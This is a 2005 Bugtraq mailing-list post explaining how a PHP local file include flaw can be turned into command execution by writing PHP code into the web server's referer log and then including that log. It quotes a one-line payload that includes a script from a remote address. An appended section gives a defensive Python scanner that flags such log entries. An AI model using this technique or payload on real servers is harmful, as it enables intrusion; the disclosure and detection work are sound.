Open Source and information security mailing list archives
 
Date: Tue, 11 Oct 2005 18:34:15 +0200
From: Andreas Zeidler <az@...c.de>
To: Bugtraq <bugtraq@...urityfocus.com>
Cc: Maksymilian Arciemowicz <max@...tsuper.pl>
Subject: using php local file include vulnerabilities for command execution

hi,

this is a comment on the recent phpmyadmin vulnerability[1] discovered
by maksymilian arciemowicz.  i didn't really know where to post this,
so i hope this is the right place.

anyway, since i've used a file inclusion vulnerability in an older
version of phpmyadmin as a starting point for a security analysis last
weekend, and came up with a rather simple idea of how to use it for
unprivileged script execution of remote php code, i thought i'd post
this here.  actually i think this method could be used on any php-based
local include vuln, so i was wondering why i couldn't yet find anything
about it on the net...

okay, the problem with local file vulns is of course, that the contents
of the file being read are not evaluated.  but given php's include
statement they are -- if they contain a valid php statement.  now instead
of trying to upload a file containing php code (which wasn't possible in
my case), i asked myself if there was a way to use the server to create it
for me?

the idea that hit me before falling asleep was to send the code i needed
(like <?php include('http://xx.xx.xx.xx/script.php'); ?>) via the
referer string, this way having the web server write it into a file for
me, and in a second step simply use the already existent local file vuln
to read the server's log file and this way execute the code.

of course this method doesn't always work.  php mustn't run in safe
mode, the web server has to log referer strings and the log files must
be accessible after privileges have been dropped.  since most people are
logging in combined format, i guess the last requirement is the most
critical one, but many logs are world-readable nevertheless.  also,
enabled url-based includes make things easier, but they're not strictly
necessary.

so, provided with a php local file vuln and readable log files,
executing arbitrary commands comes down to locating a suitable log file
to include.  with a little guessing and the ability to read files (i.e.
the server configuration) this is not too difficult.

that's it.  any comments and feedback about this are most welcome,
especially since this approach seems much too simple not to have been
used before.  maybe someone can just point me to an already existing
discussion about this... :)

regards,


andi

[1] http://www.securityfocus.com/bid/15053

-- 
zeidler it consulting - http://zitc.de/ - info@...c.de
karl-kunger-str 59 - 12435 berlin - telefon +49 30 25563779
keine softwarepatente in europa! - http://noepatents.eu.org/
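
Added example (not part of the original post, and not the poster's code): a defender-side check for the two steps the message describes, run over an access log in combined format. It flags PHP open tags logged in the request, referer or user-agent fields, and requests whose decoded target points at a log file. The sample lines, the `page` parameter name and the log path are constructed, and the patterns are heuristics that will need tuning per site.

```python
import re
from urllib.parse import unquote

# Combined log format:
# host ident user [time] "request" status bytes "referer" "user-agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+ '
    + QUOTED + ' ' + QUOTED + '$'
)
FIELDS = {"request": 3, "referer": 5, "agent": 6}

# A PHP open tag (<?php, <?=, or short tag <?) stored verbatim in the log.
# <?xml is excluded to reduce noise.
PHP_TAG = re.compile(r'<\?(?!xml)', re.I)
# Request targets that traverse directories or name a log file (heuristic).
LOG_PATH = re.compile(r'\.\./|/var/log/|(?:access|error)[._]log', re.I)

def scan(lines):
    """Return (line_number, reason) pairs for suspicious log entries."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = COMBINED.match(line.rstrip("\n"))
        if not m:
            # Lines that do not parse deserve a manual look.
            findings.append((n, "unparsed"))
            continue
        for name, idx in FIELDS.items():
            if PHP_TAG.search(m.group(idx)):
                findings.append((n, "php-tag-in-" + name))
        # Decode twice so double-encoded separators are also seen.
        target = unquote(unquote(m.group(FIELDS["request"])))
        if LOG_PATH.search(target):
            findings.append((n, "log-path-in-request"))
    return findings

# Constructed sample input (documentation addresses, inert marker).
SAMPLE = [
    '192.0.2.10 - - [11/Oct/2005:18:00:01 +0200] "GET /index.php HTTP/1.1" '
    '200 512 "http://example.org/" "Mozilla/5.0"',
    '192.0.2.66 - - [11/Oct/2005:18:00:02 +0200] "GET /index.php HTTP/1.1" '
    '200 512 "<?php /* constructed marker */ ?>" "Mozilla/5.0"',
    '192.0.2.66 - - [11/Oct/2005:18:00:09 +0200] "GET /index.php?page='
    '..%2F..%2Flogs%2Faccess_log HTTP/1.1" 200 90412 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for lineno, reason in scan(SAMPLE):
        print(lineno, reason)
```

A hit on both checks from the same client within a short window is the pattern to alert on; either one alone is weaker evidence.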
